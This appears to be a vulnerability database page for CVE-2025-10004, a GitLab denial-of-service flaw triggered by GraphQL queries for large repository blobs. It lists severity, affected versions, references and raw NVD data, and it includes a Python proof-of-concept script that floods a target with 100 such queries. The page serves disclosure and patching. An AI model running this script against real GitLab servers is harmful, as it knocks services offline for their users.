CVE-2025-10004

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.12 to 18.2.8, 18.3 to 18.3.4, and 18.4 to 18.4.2 that could make the GitLab instance unresponsive or severely degraded by sending crafted GraphQL queries requesting large repository blobs.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

GitLab CE/EE >= 13.12, < 18.2.8

GitLab CE/EE >= 18.3.0, < 18.3.4

GitLab CE/EE >= 18.4.0, < 18.4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-10004 PoC - GitLab GraphQL DoS via Large Blob Requests
# This PoC demonstrates how to exploit the vulnerability by sending
# crafted GraphQL queries requesting large repository blobs

import requests
import json

TARGET_URL = "https://gitlab.example.com/api/graphql"

# GraphQL query requesting large blobs from a repository
GRAPHQL_QUERY = """
query GetLargeBlobs($projectPath: ID!) {
  project(fullPath: $projectPath) {
    repository {
      blobs(paths: ["large_file_1.bin", "large_file_2.bin", "large_file_3.bin"]) {
        nodes {
          name
          size
          rawBlob
          rawTextBlob
        }
      }
    }
  }
}
"""

def exploit(target_url, project_path):
    """
    Send crafted GraphQL query to exhaust server resources
    by requesting large repository blobs
    """
    headers = {
        "Content-Type": "application/json",
        "Accept": "application/json"
    }
    
    payload = {
        "query": GRAPHQL_QUERY,
        "variables": {
            "projectPath": project_path
        }
    }
    
    # Send multiple concurrent requests to amplify the DoS effect
    for i in range(100):
        try:
            response = requests.post(
                target_url,
                headers=headers,
                json=payload,
                timeout=30
            )
            print(f"Request {i+1}: Status {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"Request {i+1}: Error - {e}")

if __name__ == "__main__":
    # Replace with target GitLab instance and a project containing large files
    exploit(TARGET_URL, "group/project-with-large-files")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10004
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10004
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10004/
[4] VulDB https://vuldb.com/cve/CVE-2025-10004
[5] https://about.gitlab.com/releases/2025/10/08/patch-release-gitlab-18-4-2-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/issues/568121
[7] https://hackerone.com/reports/3026555

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10004", "sourceIdentifier": "[email protected]", "published": "2025-10-09T12:15:34.570", "lastModified": "2025-10-20T20:57:04.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.12 to 18.2.8, 18.3 to 18.3.4, and 18.4 to 18.4.2 that could make the GitLab instance unresponsive or severely degraded by sending crafted GraphQL queries requesting large repository blobs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "13.12.0", "versionEndExcluding": "18.2.8", "matchCriteriaId": "BC727177-F9EF-438A-94B6-2BBCB78C4776"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "13.12.0", "versionEndExcluding": "18.2.8", "matchCriteriaId": "20F1A1DC-3585-492D-8FDF-71739290C905"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.3.0", "versionEndExcluding": "18.3.4", "matchCriteriaId": "536C1DFE-B81E-4E5E-A979-EBB8AEB62F4C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.3.0", "versionEndExcluding": "18.3.4", "matchCriteriaId": "15A762DA-E645-404C-B831-A63171FF3EF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.2", "matchCriteriaId": "A0684F06-FCCA-400A-AB87-BB9B9F906187"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.2", "matchCriteriaId": "719CBD84-A5F7-4332-8C37-D68474A2FB70"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/10/08/patch-release-gitlab-18-4-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/568121", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3026555", "source": "[email protected]", "tags": ["Permissions Required"]}]}}